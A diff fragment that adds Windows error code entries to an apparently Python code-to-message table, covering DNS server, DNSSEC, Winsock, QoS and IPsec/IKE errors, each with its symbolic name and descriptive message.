+ 0x00002392: ("DNS_ERROR_INVALID_KEY_SIZE", "The specified key size is not supported."),
+ 0x00002393: ("DNS_ERROR_SIGNING_KEY_NOT_ACCESSIBLE", "One or more of the signing keys for a zone are not accessible to the DNS server. Zone signing will not be operational until this error is resolved."),
+ 0x00002394: ("DNS_ERROR_KSP_DOES_NOT_SUPPORT_PROTECTION", "The specified key storage provider does not support DPAPI++ data protection. Zone signing will not be operational until this error is resolved."),
+ 0x00002395: ("DNS_ERROR_UNEXPECTED_DATA_PROTECTION_ERROR", "An unexpected DPAPI++ error was encountered. Zone signing will not be operational until this error is resolved."),
+ 0x00002396: ("DNS_ERROR_UNEXPECTED_CNG_ERROR", "An unexpected crypto error was encountered. Zone signing may not be operational until this error is resolved."),
+ 0x00002397: ("DNS_ERROR_UNKNOWN_SIGNING_PARAMETER_VERSION", "The DNS server encountered a signing key with an unknown version. Zone signing will not be operational until this error is resolved."),
+ 0x00002398: ("DNS_ERROR_KSP_NOT_ACCESSIBLE", "The specified key service provider cannot be opened by the DNS server."),
+ 0x00002399: ("DNS_ERROR_TOO_MANY_SKDS", "The DNS server cannot accept any more signing keys with the specified algorithm and KSK flag value for this zone."),
+ 0x0000239a: ("DNS_ERROR_INVALID_ROLLOVER_PERIOD", "The specified rollover period is invalid."),
+ 0x0000239b: ("DNS_ERROR_INVALID_INITIAL_ROLLOVER_OFFSET", "The specified initial rollover offset is invalid."),
+ 0x0000239c: ("DNS_ERROR_ROLLOVER_IN_PROGRESS", "The specified signing key is already in process of rolling over keys."),
+ 0x0000239d: ("DNS_ERROR_STANDBY_KEY_NOT_PRESENT", "The specified signing key does not have a standby key to revoke."),
+ 0x0000239e: ("DNS_ERROR_NOT_ALLOWED_ON_ZSK", "This operation is not allowed on a zone signing key (ZSK)."),
+ 0x0000239f: ("DNS_ERROR_NOT_ALLOWED_ON_ACTIVE_SKD", "This operation is not allowed on an active signing key."),
+ 0x000023a0: ("DNS_ERROR_ROLLOVER_ALREADY_QUEUED", "The specified signing key is already queued for rollover."),
+ 0x000023a1: ("DNS_ERROR_NOT_ALLOWED_ON_UNSIGNED_ZONE", "This operation is not allowed on an unsigned zone."),
+ 0x000023a2: ("DNS_ERROR_BAD_KEYMASTER", "This operation could not be completed because the DNS server listed as the current key master for this zone is down or misconfigured. Resolve the problem on the current key master for this zone or use another DNS server to seize the key master role."),
+ 0x000023a3: ("DNS_ERROR_INVALID_SIGNATURE_VALIDITY_PERIOD", "The specified signature validity period is invalid."),
+ 0x000023a4: ("DNS_ERROR_INVALID_NSEC3_ITERATION_COUNT", "The specified NSEC3 iteration count is higher than allowed by the minimum key length used in the zone."),
+ 0x000023a5: ("DNS_ERROR_DNSSEC_IS_DISABLED", "This operation could not be completed because the DNS server has been configured with DNSSEC features disabled. Enable DNSSEC on the DNS server."),
+ 0x000023a6: ("DNS_ERROR_INVALID_XML", "This operation could not be completed because the XML stream received is empty or syntactically invalid."),
+ 0x000023a7: ("DNS_ERROR_NO_VALID_TRUST_ANCHORS", "This operation completed, but no trust anchors were added because all of the trust anchors received were either invalid, unsupported, expired, or would not become valid in less than 30 days."),
+ 0x000023a8: ("DNS_ERROR_ROLLOVER_NOT_POKEABLE", "The specified signing key is not waiting for parental DS update."),
+ 0x000023a9: ("DNS_ERROR_NSEC3_NAME_COLLISION", "Hash collision detected during NSEC3 signing. Specify a different user-provided salt, or use a randomly generated salt, and attempt to sign the zone again."),
+ 0x000023aa: ("DNS_ERROR_NSEC_INCOMPATIBLE_WITH_NSEC3_RSA_SHA1", "NSEC is not compatible with the NSEC3-RSA-SHA-1 algorithm. Choose a different algorithm or use NSEC3."),
+ 0x0000251d: ("DNS_INFO_NO_RECORDS", "No records found for given DNS query."),
+ 0x0000251e: ("DNS_ERROR_BAD_PACKET", "Bad DNS packet."),
+ 0x0000251f: ("DNS_ERROR_NO_PACKET", "No DNS packet."),
+ 0x00002520: ("DNS_ERROR_RCODE", "DNS error, check rcode."),
+ 0x00002521: ("DNS_ERROR_UNSECURE_PACKET", "Unsecured DNS packet."),
+ 0x00002522: ("DNS_REQUEST_PENDING", "DNS query request is pending."),
+ 0x0000254f: ("DNS_ERROR_INVALID_TYPE", "Invalid DNS type."),
+ 0x00002550: ("DNS_ERROR_INVALID_IP_ADDRESS", "Invalid IP address."),
+ 0x00002551: ("DNS_ERROR_INVALID_PROPERTY", "Invalid property."),
+ 0x00002552: ("DNS_ERROR_TRY_AGAIN_LATER", "Try DNS operation again later."),
+ 0x00002553: ("DNS_ERROR_NOT_UNIQUE", "Record for given name and type is not unique."),
+ 0x00002554: ("DNS_ERROR_NON_RFC_NAME", "DNS name does not comply with RFC specifications."),
+ 0x00002555: ("DNS_STATUS_FQDN", "DNS name is a fully-qualified DNS name."),
+ 0x00002556: ("DNS_STATUS_DOTTED_NAME", "DNS name is dotted (multi-label)."),
+ 0x00002557: ("DNS_STATUS_SINGLE_PART_NAME", "DNS name is a single-part name."),
+ 0x00002558: ("DNS_ERROR_INVALID_NAME_CHAR", "DNS name contains an invalid character."),
+ 0x00002559: ("DNS_ERROR_NUMERIC_NAME", "DNS name is entirely numeric."),
+ 0x0000255a: ("DNS_ERROR_NOT_ALLOWED_ON_ROOT_SERVER", "The operation requested is not permitted on a DNS root server."),
+ 0x0000255b: ("DNS_ERROR_NOT_ALLOWED_UNDER_DELEGATION", "The record could not be created because this part of the DNS namespace has been delegated to another server."),
+ 0x0000255c: ("DNS_ERROR_CANNOT_FIND_ROOT_HINTS", "The DNS server could not find a set of root hints."),
+ 0x0000255d: ("DNS_ERROR_INCONSISTENT_ROOT_HINTS", "The DNS server found root hints but they were not consistent across all adapters."),
+ 0x0000255e: ("DNS_ERROR_DWORD_VALUE_TOO_SMALL", "The specified value is too small for this parameter."),
+ 0x0000255f: ("DNS_ERROR_DWORD_VALUE_TOO_LARGE", "The specified value is too large for this parameter."),
+ 0x00002560: ("DNS_ERROR_BACKGROUND_LOADING", "This operation is not allowed while the DNS server is loading zones in the background. Please try again later."),
+ 0x00002561: ("DNS_ERROR_NOT_ALLOWED_ON_RODC", "The operation requested is not permitted on against a DNS server running on a read-only DC."),
+ 0x00002562: ("DNS_ERROR_NOT_ALLOWED_UNDER_DNAME", "No data is allowed to exist underneath a DNAME record."),
+ 0x00002563: ("DNS_ERROR_DELEGATION_REQUIRED", "This operation requires credentials delegation."),
+ 0x00002564: ("DNS_ERROR_INVALID_POLICY_TABLE", "Name resolution policy table has been corrupted. DNS resolution will fail until it is fixed. Contact your network administrator."),
+ 0x00002581: ("DNS_ERROR_ZONE_DOES_NOT_EXIST", "DNS zone does not exist."),
+ 0x00002582: ("DNS_ERROR_NO_ZONE_INFO", "DNS zone information not available."),
+ 0x00002583: ("DNS_ERROR_INVALID_ZONE_OPERATION", "Invalid operation for DNS zone."),
+ 0x00002584: ("DNS_ERROR_ZONE_CONFIGURATION_ERROR", "Invalid DNS zone configuration."),
+ 0x00002585: ("DNS_ERROR_ZONE_HAS_NO_SOA_RECORD", "DNS zone has no start of authority (SOA) record."),
+ 0x00002586: ("DNS_ERROR_ZONE_HAS_NO_NS_RECORDS", "DNS zone has no Name Server (NS) record."),
+ 0x00002587: ("DNS_ERROR_ZONE_LOCKED", "DNS zone is locked."),
+ 0x00002588: ("DNS_ERROR_ZONE_CREATION_FAILED", "DNS zone creation failed."),
+ 0x00002589: ("DNS_ERROR_ZONE_ALREADY_EXISTS", "DNS zone already exists."),
+ 0x0000258a: ("DNS_ERROR_AUTOZONE_ALREADY_EXISTS", "DNS automatic zone already exists."),
+ 0x0000258b: ("DNS_ERROR_INVALID_ZONE_TYPE", "Invalid DNS zone type."),
+ 0x0000258c: ("DNS_ERROR_SECONDARY_REQUIRES_MASTER_IP", "Secondary DNS zone requires master IP address."),
+ 0x0000258d: ("DNS_ERROR_ZONE_NOT_SECONDARY", "DNS zone not secondary."),
+ 0x0000258e: ("DNS_ERROR_NEED_SECONDARY_ADDRESSES", "Need secondary IP address."),
+ 0x0000258f: ("DNS_ERROR_WINS_INIT_FAILED", "WINS initialization failed."),
+ 0x00002590: ("DNS_ERROR_NEED_WINS_SERVERS", "Need WINS servers."),
+ 0x00002591: ("DNS_ERROR_NBSTAT_INIT_FAILED", "NBTSTAT initialization call failed."),
+ 0x00002592: ("DNS_ERROR_SOA_DELETE_INVALID", "Invalid delete of start of authority (SOA)"),
+ 0x00002593: ("DNS_ERROR_FORWARDER_ALREADY_EXISTS", "A conditional forwarding zone already exists for that name."),
+ 0x00002594: ("DNS_ERROR_ZONE_REQUIRES_MASTER_IP", "This zone must be configured with one or more master DNS server IP addresses."),
+ 0x00002595: ("DNS_ERROR_ZONE_IS_SHUTDOWN", "The operation cannot be performed because this zone is shut down."),
+ 0x00002596: ("DNS_ERROR_ZONE_LOCKED_FOR_SIGNING", "This operation cannot be performed because the zone is currently being signed. Please try again later."),
+ 0x000025b3: ("DNS_ERROR_PRIMARY_REQUIRES_DATAFILE", "Primary DNS zone requires datafile."),
+ 0x000025b4: ("DNS_ERROR_INVALID_DATAFILE_NAME", "Invalid datafile name for DNS zone."),
+ 0x000025b5: ("DNS_ERROR_DATAFILE_OPEN_FAILURE", "Failed to open datafile for DNS zone."),
+ 0x000025b6: ("DNS_ERROR_FILE_WRITEBACK_FAILED", "Failed to write datafile for DNS zone."),
+ 0x000025b7: ("DNS_ERROR_DATAFILE_PARSING", "Failure while reading datafile for DNS zone."),
+ 0x000025e5: ("DNS_ERROR_RECORD_DOES_NOT_EXIST", "DNS record does not exist."),
+ 0x000025e6: ("DNS_ERROR_RECORD_FORMAT", "DNS record format error."),
+ 0x000025e7: ("DNS_ERROR_NODE_CREATION_FAILED", "Node creation failure in DNS."),
+ 0x000025e8: ("DNS_ERROR_UNKNOWN_RECORD_TYPE", "Unknown DNS record type."),
+ 0x000025e9: ("DNS_ERROR_RECORD_TIMED_OUT", "DNS record timed out."),
+ 0x000025ea: ("DNS_ERROR_NAME_NOT_IN_ZONE", "Name not in DNS zone."),
+ 0x000025eb: ("DNS_ERROR_CNAME_LOOP", "CNAME loop detected."),
+ 0x000025ec: ("DNS_ERROR_NODE_IS_CNAME", "Node is a CNAME DNS record."),
+ 0x000025ed: ("DNS_ERROR_CNAME_COLLISION", "A CNAME record already exists for given name."),
+ 0x000025ee: ("DNS_ERROR_RECORD_ONLY_AT_ZONE_ROOT", "Record only at DNS zone root."),
+ 0x000025ef: ("DNS_ERROR_RECORD_ALREADY_EXISTS", "DNS record already exists."),
+ 0x000025f0: ("DNS_ERROR_SECONDARY_DATA", "Secondary DNS zone data error."),
+ 0x000025f1: ("DNS_ERROR_NO_CREATE_CACHE_DATA", "Could not create DNS cache data."),
+ 0x000025f2: ("DNS_ERROR_NAME_DOES_NOT_EXIST", "DNS name does not exist."),
+ 0x000025f3: ("DNS_WARNING_PTR_CREATE_FAILED", "Could not create pointer (PTR) record."),
+ 0x000025f4: ("DNS_WARNING_DOMAIN_UNDELETED", "DNS domain was undeleted."),
+ 0x000025f5: ("DNS_ERROR_DS_UNAVAILABLE", "The directory service is unavailable."),
+ 0x000025f6: ("DNS_ERROR_DS_ZONE_ALREADY_EXISTS", "DNS zone already exists in the directory service."),
+ 0x000025f7: ("DNS_ERROR_NO_BOOTFILE_IF_DS_ZONE", "DNS server not creating or reading the boot file for the directory service integrated DNS zone."),
+ 0x000025f8: ("DNS_ERROR_NODE_IS_DNAME", "Node is a DNAME DNS record."),
+ 0x000025f9: ("DNS_ERROR_DNAME_COLLISION", "A DNAME record already exists for given name."),
+ 0x000025fa: ("DNS_ERROR_ALIAS_LOOP", "An alias loop has been detected with either CNAME or DNAME records."),
+ 0x00002617: ("DNS_INFO_AXFR_COMPLETE", "DNS AXFR (zone transfer) complete."),
+ 0x00002618: ("DNS_ERROR_AXFR", "DNS zone transfer failed."),
+ 0x00002619: ("DNS_INFO_ADDED_LOCAL_WINS", "Added local WINS server."),
+ 0x00002649: ("DNS_STATUS_CONTINUE_NEEDED", "Secure update call needs to continue update request."),
+ 0x0000267b: ("DNS_ERROR_NO_TCPIP", "TCP/IP network protocol not installed."),
+ 0x0000267c: ("DNS_ERROR_NO_DNS_SERVERS", "No DNS servers configured for local system."),
+ 0x000026ad: ("DNS_ERROR_DP_DOES_NOT_EXIST", "The specified directory partition does not exist."),
+ 0x000026ae: ("DNS_ERROR_DP_ALREADY_EXISTS", "The specified directory partition already exists."),
+ 0x000026af: ("DNS_ERROR_DP_NOT_ENLISTED", "This DNS server is not enlisted in the specified directory partition."),
+ 0x000026b0: ("DNS_ERROR_DP_ALREADY_ENLISTED", "This DNS server is already enlisted in the specified directory partition."),
+ 0x000026b1: ("DNS_ERROR_DP_NOT_AVAILABLE", "The directory partition is not available at this time. Please wait a few minutes and try again."),
+ 0x000026b2: ("DNS_ERROR_DP_FSMO_ERROR", "The operation failed because the domain naming master FSMO role could not be reached. The domain controller holding the domain naming master FSMO role is down or unable to service the request or is not running Windows Server 2003 or later."),
+ 0x00002714: ("WSAEINTR", "A blocking operation was interrupted by a call to WSACancelBlockingCall."),
+ 0x00002719: ("WSAEBADF", "The file handle supplied is not valid."),
+ 0x0000271d: ("WSAEACCES", "An attempt was made to access a socket in a way forbidden by its access permissions."),
+ 0x0000271e: ("WSAEFAULT", "The system detected an invalid pointer address in attempting to use a pointer argument in a call."),
+ 0x00002726: ("WSAEINVAL", "An invalid argument was supplied."),
+ 0x00002728: ("WSAEMFILE", "Too many open sockets."),
+ 0x00002733: ("WSAEWOULDBLOCK", "A non-blocking socket operation could not be completed immediately."),
+ 0x00002734: ("WSAEINPROGRESS", "A blocking operation is currently executing."),
+ 0x00002735: ("WSAEALREADY", "An operation was attempted on a non-blocking socket that already had an operation in progress."),
+ 0x00002736: ("WSAENOTSOCK", "An operation was attempted on something that is not a socket."),
+ 0x00002737: ("WSAEDESTADDRREQ", "A required address was omitted from an operation on a socket."),
+ 0x00002738: ("WSAEMSGSIZE", "A message sent on a datagram socket was larger than the internal message buffer or some other network limit, or the buffer used to receive a datagram into was smaller than the datagram itself."),
+ 0x00002739: ("WSAEPROTOTYPE", "A protocol was specified in the socket function call that does not support the semantics of the socket type requested."),
+ 0x0000273a: ("WSAENOPROTOOPT", "An unknown, invalid, or unsupported option or level was specified in a getsockopt or setsockopt call."),
+ 0x0000273b: ("WSAEPROTONOSUPPORT", "The requested protocol has not been configured into the system, or no implementation for it exists."),
+ 0x0000273c: ("WSAESOCKTNOSUPPORT", "The support for the specified socket type does not exist in this address family."),
+ 0x0000273d: ("WSAEOPNOTSUPP", "The attempted operation is not supported for the type of object referenced."),
+ 0x0000273e: ("WSAEPFNOSUPPORT", "The protocol family has not been configured into the system or no implementation for it exists."),
+ 0x0000273f: ("WSAEAFNOSUPPORT", "An address incompatible with the requested protocol was used."),
+ 0x00002740: ("WSAEADDRINUSE", "Only one usage of each socket address (protocol/network address/port) is normally permitted."),
+ 0x00002741: ("WSAEADDRNOTAVAIL", "The requested address is not valid in its context."),
+ 0x00002742: ("WSAENETDOWN", "A socket operation encountered a dead network."),
+ 0x00002743: ("WSAENETUNREACH", "A socket operation was attempted to an unreachable network."),
+ 0x00002744: ("WSAENETRESET", "The connection has been broken due to keep-alive activity detecting a failure while the operation was in progress."),
+ 0x00002745: ("WSAECONNABORTED", "An established connection was aborted by the software in your host machine."),
+ 0x00002746: ("WSAECONNRESET", "An existing connection was forcibly closed by the remote host."),
+ 0x00002747: ("WSAENOBUFS", "An operation on a socket could not be performed because the system lacked sufficient buffer space or because a queue was full."),
+ 0x00002748: ("WSAEISCONN", "A connect request was made on an already connected socket."),
+ 0x00002749: ("WSAENOTCONN", "A request to send or receive data was disallowed because the socket is not connected and (when sending on a datagram socket using a sendto call) no address was supplied."),
+ 0x0000274a: ("WSAESHUTDOWN", "A request to send or receive data was disallowed because the socket had already been shut down in that direction with a previous shutdown call."),
+ 0x0000274b: ("WSAETOOMANYREFS", "Too many references to some kernel object."),
+ 0x0000274c: ("WSAETIMEDOUT", "A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond."),
+ 0x0000274d: ("WSAECONNREFUSED", "No connection could be made because the target machine actively refused it."),
+ 0x0000274e: ("WSAELOOP", "Cannot translate name."),
+ 0x0000274f: ("WSAENAMETOOLONG", "Name component or name was too long."),
+ 0x00002750: ("WSAEHOSTDOWN", "A socket operation failed because the destination host was down."),
+ 0x00002751: ("WSAEHOSTUNREACH", "A socket operation was attempted to an unreachable host."),
+ 0x00002752: ("WSAENOTEMPTY", "Cannot remove a directory that is not empty."),
+ 0x00002753: ("WSAEPROCLIM", "A Windows Sockets implementation may have a limit on the number of applications that may use it simultaneously."),
+ 0x00002754: ("WSAEUSERS", "Ran out of quota."),
+ 0x00002755: ("WSAEDQUOT", "Ran out of disk quota."),
+ 0x00002756: ("WSAESTALE", "File handle reference is no longer available."),
+ 0x00002757: ("WSAEREMOTE", "Item is not available locally."),
+ 0x0000276b: ("WSASYSNOTREADY", "WSAStartup cannot function at this time because the underlying system it uses to provide network services is currently unavailable."),
+ 0x0000276c: ("WSAVERNOTSUPPORTED", "The Windows Sockets version requested is not supported."),
+ 0x0000276d: ("WSANOTINITIALISED", "Either the application has not called WSAStartup, or WSAStartup failed."),
+ 0x00002775: ("WSAEDISCON", "Returned by WSARecv or WSARecvFrom to indicate the remote party has initiated a graceful shutdown sequence."),
+ 0x00002776: ("WSAENOMORE", "No more results can be returned by WSALookupServiceNext."),
+ 0x00002777: ("WSAECANCELLED", "A call to WSALookupServiceEnd was made while this call was still processing. The call has been canceled."),
+ 0x00002778: ("WSAEINVALIDPROCTABLE", "The procedure call table is invalid."),
+ 0x00002779: ("WSAEINVALIDPROVIDER", "The requested service provider is invalid."),
+ 0x0000277a: ("WSAEPROVIDERFAILEDINIT", "The requested service provider could not be loaded or initialized."),
+ 0x0000277b: ("WSASYSCALLFAILURE", "A system call has failed."),
+ 0x0000277c: ("WSASERVICE_NOT_FOUND", "No such service is known. The service cannot be found in the specified name space."),
+ 0x0000277d: ("WSATYPE_NOT_FOUND", "The specified class was not found."),
+ 0x0000277e: ("WSA_E_NO_MORE", "No more results can be returned by WSALookupServiceNext."),
+ 0x0000277f: ("WSA_E_CANCELLED", "A call to WSALookupServiceEnd was made while this call was still processing. The call has been canceled."),
+ 0x00002780: ("WSAEREFUSED", "A database query failed because it was actively refused."),
+ 0x00002af9: ("WSAHOST_NOT_FOUND", "No such host is known."),
+ 0x00002afa: ("WSATRY_AGAIN", "This is usually a temporary error during hostname resolution and means that the local server did not receive a response from an authoritative server."),
+ 0x00002afb: ("WSANO_RECOVERY", "A non-recoverable error occurred during a database lookup."),
+ 0x00002afc: ("WSANO_DATA", "The requested name is valid, but no data of the requested type was found."),
+ 0x00002afd: ("WSA_QOS_RECEIVERS", "At least one reserve has arrived."),
+ 0x00002afe: ("WSA_QOS_SENDERS", "At least one path has arrived."),
+ 0x00002aff: ("WSA_QOS_NO_SENDERS", "There are no senders."),
+ 0x00002b00: ("WSA_QOS_NO_RECEIVERS", "There are no receivers."),
+ 0x00002b01: ("WSA_QOS_REQUEST_CONFIRMED", "Reserve has been confirmed."),
+ 0x00002b02: ("WSA_QOS_ADMISSION_FAILURE", "Error due to lack of resources."),
+ 0x00002b03: ("WSA_QOS_POLICY_FAILURE", "Rejected for administrative reasons - bad credentials."),
+ 0x00002b04: ("WSA_QOS_BAD_STYLE", "Unknown or conflicting style."),
+ 0x00002b05: ("WSA_QOS_BAD_OBJECT", "Problem with some part of the filterspec or providerspecific buffer in general."),
+ 0x00002b06: ("WSA_QOS_TRAFFIC_CTRL_ERROR", "Problem with some part of the flowspec."),
+ 0x00002b07: ("WSA_QOS_GENERIC_ERROR", "General QOS error."),
+ 0x00002b08: ("WSA_QOS_ESERVICETYPE", "An invalid or unrecognized service type was found in the flowspec."),
+ 0x00002b09: ("WSA_QOS_EFLOWSPEC", "An invalid or inconsistent flowspec was found in the QOS structure."),
+ 0x00002b0a: ("WSA_QOS_EPROVSPECBUF", "Invalid QOS provider-specific buffer."),
+ 0x00002b0b: ("WSA_QOS_EFILTERSTYLE", "An invalid QOS filter style was used."),
+ 0x00002b0c: ("WSA_QOS_EFILTERTYPE", "An invalid QOS filter type was used."),
+ 0x00002b0d: ("WSA_QOS_EFILTERCOUNT", "An incorrect number of QOS FILTERSPECs were specified in the FLOWDESCRIPTOR."),
+ 0x00002b0e: ("WSA_QOS_EOBJLENGTH", "An object with an invalid ObjectLength field was specified in the QOS provider-specific buffer."),
+ 0x00002b0f: ("WSA_QOS_EFLOWCOUNT", "An incorrect number of flow descriptors was specified in the QOS structure."),
+ 0x00002b10: ("WSA_QOS_EUNKOWNPSOBJ", "An unrecognized object was found in the QOS provider-specific buffer."),
+ 0x00002b11: ("WSA_QOS_EPOLICYOBJ", "An invalid policy object was found in the QOS provider-specific buffer."),
+ 0x00002b12: ("WSA_QOS_EFLOWDESC", "An invalid QOS flow descriptor was found in the flow descriptor list."),
+ 0x00002b13: ("WSA_QOS_EPSFLOWSPEC", "An invalid or inconsistent flowspec was found in the QOS provider specific buffer."),
+ 0x00002b14: ("WSA_QOS_EPSFILTERSPEC", "An invalid FILTERSPEC was found in the QOS provider-specific buffer."),
+ 0x00002b15: ("WSA_QOS_ESDMODEOBJ", "An invalid shape discard mode object was found in the QOS provider specific buffer."),
+ 0x00002b16: ("WSA_QOS_ESHAPERATEOBJ", "An invalid shaping rate object was found in the QOS provider-specific buffer."),
+ 0x00002b17: ("WSA_QOS_RESERVED_PETYPE", "A reserved policy element was found in the QOS provider-specific buffer."),
+ 0x00002b18: ("WSA_SECURE_HOST_NOT_FOUND", "No such host is known securely."),
+ 0x00002b19: ("WSA_IPSEC_NAME_POLICY_ERROR", "Name based IPSEC policy could not be added."),
+ 0x000032c8: ("ERROR_IPSEC_QM_POLICY_EXISTS", "The specified quick mode policy already exists."),
+ 0x000032c9: ("ERROR_IPSEC_QM_POLICY_NOT_FOUND", "The specified quick mode policy was not found."),
+ 0x000032ca: ("ERROR_IPSEC_QM_POLICY_IN_USE", "The specified quick mode policy is being used."),
+ 0x000032cb: ("ERROR_IPSEC_MM_POLICY_EXISTS", "The specified main mode policy already exists."),
+ 0x000032cc: ("ERROR_IPSEC_MM_POLICY_NOT_FOUND", "The specified main mode policy was not found"),
+ 0x000032cd: ("ERROR_IPSEC_MM_POLICY_IN_USE", "The specified main mode policy is being used."),
+ 0x000032ce: ("ERROR_IPSEC_MM_FILTER_EXISTS", "The specified main mode filter already exists."),
+ 0x000032cf: ("ERROR_IPSEC_MM_FILTER_NOT_FOUND", "The specified main mode filter was not found."),
+ 0x000032d0: ("ERROR_IPSEC_TRANSPORT_FILTER_EXISTS", "The specified transport mode filter already exists."),
+ 0x000032d1: ("ERROR_IPSEC_TRANSPORT_FILTER_NOT_FOUND", "The specified transport mode filter does not exist."),
+ 0x000032d2: ("ERROR_IPSEC_MM_AUTH_EXISTS", "The specified main mode authentication list exists."),
+ 0x000032d3: ("ERROR_IPSEC_MM_AUTH_NOT_FOUND", "The specified main mode authentication list was not found."),
+ 0x000032d4: ("ERROR_IPSEC_MM_AUTH_IN_USE", "The specified main mode authentication list is being used."),
+ 0x000032d5: ("ERROR_IPSEC_DEFAULT_MM_POLICY_NOT_FOUND", "The specified default main mode policy was not found."),
+ 0x000032d6: ("ERROR_IPSEC_DEFAULT_MM_AUTH_NOT_FOUND", "The specified default main mode authentication list was not found."),
+ 0x000032d7: ("ERROR_IPSEC_DEFAULT_QM_POLICY_NOT_FOUND", "The specified default quick mode policy was not found."),
+ 0x000032d8: ("ERROR_IPSEC_TUNNEL_FILTER_EXISTS", "The specified tunnel mode filter exists."),
+ 0x000032d9: ("ERROR_IPSEC_TUNNEL_FILTER_NOT_FOUND", "The specified tunnel mode filter was not found."),
+ 0x000032da: ("ERROR_IPSEC_MM_FILTER_PENDING_DELETION", "The Main Mode filter is pending deletion."),
+ 0x000032db: ("ERROR_IPSEC_TRANSPORT_FILTER_PENDING_DELETION", "The transport filter is pending deletion."),
+ 0x000032dc: ("ERROR_IPSEC_TUNNEL_FILTER_PENDING_DELETION", "The tunnel filter is pending deletion."),
+ 0x000032dd: ("ERROR_IPSEC_MM_POLICY_PENDING_DELETION", "The Main Mode policy is pending deletion."),
+ 0x000032de: ("ERROR_IPSEC_MM_AUTH_PENDING_DELETION", "The Main Mode authentication bundle is pending deletion."),
+ 0x000032df: ("ERROR_IPSEC_QM_POLICY_PENDING_DELETION", "The Quick Mode policy is pending deletion."),
+ 0x000032e0: ("WARNING_IPSEC_MM_POLICY_PRUNED", "The Main Mode policy was successfully added, but some of the requested offers are not supported."),
+ 0x000032e1: ("WARNING_IPSEC_QM_POLICY_PRUNED", "The Quick Mode policy was successfully added, but some of the requested offers are not supported."),
+ 0x000035e8: ("ERROR_IPSEC_IKE_NEG_STATUS_BEGIN", " ERROR_IPSEC_IKE_NEG_STATUS_BEGIN"),
+ 0x000035e9: ("ERROR_IPSEC_IKE_AUTH_FAIL", "IKE authentication credentials are unacceptable"),
+ 0x000035ea: ("ERROR_IPSEC_IKE_ATTRIB_FAIL", "IKE security attributes are unacceptable"),
+ 0x000035eb: ("ERROR_IPSEC_IKE_NEGOTIATION_PENDING", "IKE Negotiation in progress"),
+ 0x000035ec: ("ERROR_IPSEC_IKE_GENERAL_PROCESSING_ERROR", "General processing error"),
+ 0x000035ed: ("ERROR_IPSEC_IKE_TIMED_OUT", "Negotiation timed out"),
+ 0x000035ee: ("ERROR_IPSEC_IKE_NO_CERT", "IKE failed to find valid machine certificate. Contact your Network Security Administrator about installing a valid certificate in the appropriate Certificate Store."),
+ 0x000035ef: ("ERROR_IPSEC_IKE_SA_DELETED", "IKE SA deleted by peer before establishment completed"),
+ 0x000035f0: ("ERROR_IPSEC_IKE_SA_REAPED", "IKE SA deleted before establishment completed"),
+ 0x000035f1: ("ERROR_IPSEC_IKE_MM_ACQUIRE_DROP", "Negotiation request sat in Queue too long"),
+ 0x000035f2: ("ERROR_IPSEC_IKE_QM_ACQUIRE_DROP", "Negotiation request sat in Queue too long"),
+ 0x000035f3: ("ERROR_IPSEC_IKE_QUEUE_DROP_MM", "Negotiation request sat in Queue too long"),
+ 0x000035f4: ("ERROR_IPSEC_IKE_QUEUE_DROP_NO_MM", "Negotiation request sat in Queue too long"),
+ 0x000035f5: ("ERROR_IPSEC_IKE_DROP_NO_RESPONSE", "No response from peer"),
+ 0x000035f6: ("ERROR_IPSEC_IKE_MM_DELAY_DROP", "Negotiation took too long"),
+ 0x000035f7: ("ERROR_IPSEC_IKE_QM_DELAY_DROP", "Negotiation took too long"),
+ 0x000035f8: ("ERROR_IPSEC_IKE_ERROR", "Unknown error occurred"),
+ 0x000035f9: ("ERROR_IPSEC_IKE_CRL_FAILED", "Certificate Revocation Check failed"),
+ 0x000035fa: ("ERROR_IPSEC_IKE_INVALID_KEY_USAGE", "Invalid certificate key usage"),
+ 0x000035fb: ("ERROR_IPSEC_IKE_INVALID_CERT_TYPE", "Invalid certificate type"),
+ 0x000035fc: ("ERROR_IPSEC_IKE_NO_PRIVATE_KEY", "IKE negotiation failed because the machine certificate used does not have a private key. IPsec certificates require a private key. Contact your Network Security administrator about replacing with a certificate that has a private key."),
+ 0x000035fd: ("ERROR_IPSEC_IKE_SIMULTANEOUS_REKEY", "Simultaneous rekeys were detected."),
+ 0x000035fe: ("ERROR_IPSEC_IKE_DH_FAIL", "Failure in Diffie-Hellman computation"),
+ 0x000035ff: ("ERROR_IPSEC_IKE_CRITICAL_PAYLOAD_NOT_RECOGNIZED", "Don't know how to process critical payload"),
+ 0x00003600: ("ERROR_IPSEC_IKE_INVALID_HEADER", "Invalid header"),
+ 0x00003601: ("ERROR_IPSEC_IKE_NO_POLICY", "No policy configured"),
+ 0x00003602: ("ERROR_IPSEC_IKE_INVALID_SIGNATURE", "Failed to verify signature"),
+ 0x00003603: ("ERROR_IPSEC_IKE_KERBEROS_ERROR", "Failed to authenticate using Kerberos"),
+ 0x00003604: ("ERROR_IPSEC_IKE_NO_PUBLIC_KEY", "Peer's certificate did not have a public key"),
+ 0x00003605: ("ERROR_IPSEC_IKE_PROCESS_ERR", "Error processing error payload"),
+ 0x00003606: ("ERROR_IPSEC_IKE_PROCESS_ERR_SA", "Error processing SA payload"),
+ 0x00003607: ("ERROR_IPSEC_IKE_PROCESS_ERR_PROP", "Error processing Proposal payload"),
+ 0x00003608: ("ERROR_IPSEC_IKE_PROCESS_ERR_TRANS", "Error processing Transform payload"),
+ 0x00003609: ("ERROR_IPSEC_IKE_PROCESS_ERR_KE", "Error processing KE payload"),
+ 0x0000360a: ("ERROR_IPSEC_IKE_PROCESS_ERR_ID", "Error processing ID payload"),
+ 0x0000360b: ("ERROR_IPSEC_IKE_PROCESS_ERR_CERT", "Error processing Cert payload"),
+ 0x0000360c: ("ERROR_IPSEC_IKE_PROCESS_ERR_CERT_REQ", "Error processing Certificate Request payload"),
+ 0x0000360d: ("ERROR_IPSEC_IKE_PROCESS_ERR_HASH", "Error processing Hash payload"),
+ 0x0000360e: ("ERROR_IPSEC_IKE_PROCESS_ERR_SIG", "Error processing Signature payload"),
+ 0x0000360f: ("ERROR_IPSEC_IKE_PROCESS_ERR_NONCE", "Error processing Nonce payload"),
+ 0x00003610: ("ERROR_IPSEC_IKE_PROCESS_ERR_NOTIFY", "Error processing Notify payload"),
+ 0x00003611: ("ERROR_IPSEC_IKE_PROCESS_ERR_DELETE", "Error processing Delete Payload"),
+ 0x00003612: ("ERROR_IPSEC_IKE_PROCESS_ERR_VENDOR", "Error processing VendorId payload"),
+ 0x00003613: ("ERROR_IPSEC_IKE_INVALID_PAYLOAD", "Invalid payload received"),
